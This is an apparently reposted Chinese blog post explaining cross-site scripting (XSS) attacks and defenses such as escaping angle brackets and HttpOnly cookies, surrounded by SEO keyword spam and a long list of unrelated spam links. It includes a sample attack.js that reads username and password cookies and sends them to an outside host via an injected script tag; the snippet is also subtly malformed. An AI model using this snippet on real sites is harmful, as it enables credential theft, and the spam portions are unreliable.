当前位置: 首页 > news >正文

平原县网站seo优化排名百度seo报价

平原县网站seo优化排名,百度seo报价,棋牌网站怎么做,张家港做政府网站的公司title: XSS攻击 date: 2023-08-27 19:15:57 tags: [XSS, 网络安全] categories: 网络安全 今天学习了一个网络攻击的手段,XSS攻击技术,大家自建网站的朋友,记得看看是否有此漏洞。 🎈 XSS 攻击 全称跨站脚本攻击 Cross Site Sc…

title: XSS攻击

date: 2023-08-27 19:15:57

tags: [XSS, 网络安全]

categories: 网络安全


今天学习了一个网络攻击的手段,XSS攻击技术,大家自建网站的朋友,记得看看是否有此漏洞。

🎈 XSS 攻击
全称跨站脚本攻击 Cross Site Scripting
为了与重叠样式表 CSS 进行区分,所以换了另一个缩写名称 XSS。
XSS攻击者通过篡改网页,注入恶意的 HTML 脚本,一般是 javascript,在用户浏览网页时,控制用户浏览器进行恶意操作的一种攻击方式。
XSS 攻击经常使用在论坛,博客等应用中。攻击者可以偷取用户Cookie、密码等重要数据,进而伪造交易、盗取用户财产、窃取情报等私密信息。

xss1

就像上图,如果用户在评论框中输入的并不是正常的文本,而是一段 javascript 脚本,而后台又没对该用户的数据进行处理,直接存入数据库,那么当其他用户过来访问该页面,浏览器必然会执行这段脚本
当然这只是恶趣味,而真正的黑客并不会仅仅满足这样的恶趣味,可能更多的是想通过这些 注入脚本,获取你的 个人信息 ,甚至是你的账号密码等信息。

xss2

由上图可知,用户其实在评论的时候,引入了一个第三方脚本,在这个脚本中获取你浏览器的 cookie 信息,并发送到指定的接口进行保存处理,这样你的信息就已经泄露了:


// attack.js 中的逻辑
var uname = $.cookie('username'); // 获取账号
var pwd = $.cookie('password'); // 获取密码// 发送请求
$('body').appendTo('<script src=`http://autofelix.com/index.php?username=${uname}&password=${pwd}`></script>');

在上面逻辑中,脚本中获取了你的个人信息,并将你的个人信息发送到后端 php 文件中进行处理保存,这样你的个人信息就已经泄露了,所以杜绝 xss攻击 在网络安全中非常的重要
所以后端永远不要相信用户提交的数据,在接收用户提交的信息时候,要进行 消毒处理
也就是过滤一些特殊的字符,比如 javascript 脚本中的 <> 进行转移 <> 再进行存储,这样就能有效的进行 xss 攻击的预防
另外如果 cookie 中设置了 HttpOnly 属性,那么通过 js 脚本将无法读取到cookie 信息,这样也能有效的防止 XSS 攻击窃取 cookie 内容

在这里插入图片描述


好记性不如烂笔头。

http://www.15wanjia.com/news/57177.html

相关文章:

  • 祖庙网站建设公司电商软文范例
  • 建网站挣钱靠谱吗苏州seo怎么做
  • 如何做网站?私人网站服务器
  • 商城web网站开发百度快照怎么做
  • 青岛模板建站多少钱网络营销典型案例
  • 新的网站平台如何做地推百度公司地址
  • 5在线做网站如何设计企业网站
  • 建设企业展示网站爱站seo
  • 网站备案负责人修改360搜索引擎推广
  • 教育网站设计方案seo优化公司哪家好
  • 网站的分类有哪些找客户资源的软件哪个最靠谱
  • 做网站用的小图标今天的新闻有哪些
  • 网站的支付系统怎么做在线培训app
  • 查询网站备案查询深圳网络推广服务是什么
  • 山东德州网站建设哪家最好网站结构有哪几种
  • 动效做的好的网站企业网站优化
  • 网站建设扌首选金手指萧山区seo关键词排名
  • 南昌网站开发建设长沙网络推广营销
  • 模拟创建一个公司石家庄百度快照优化排名
  • 个人网站设计论文道客巴巴百度客服中心人工在线咨询
  • 武汉汉口做网站哪家好社群营销的案例
  • 58同城深圳招聘网站个人自己免费建网站
  • 大型网站制作哪家好品牌软文案例
  • 广东网站建设便捷可以访问违规网站的浏览器
  • 郑州做网站九零后找代写文章写手
  • 淘特app官方网站下载竞价推广哪里开户
  • 福州专业建站公司短链接生成网址
  • 佛山做网站上海好的seo公司
  • 有想做企业网站建设推广公众号
  • 东莞视频网站制作今日军事新闻头条视频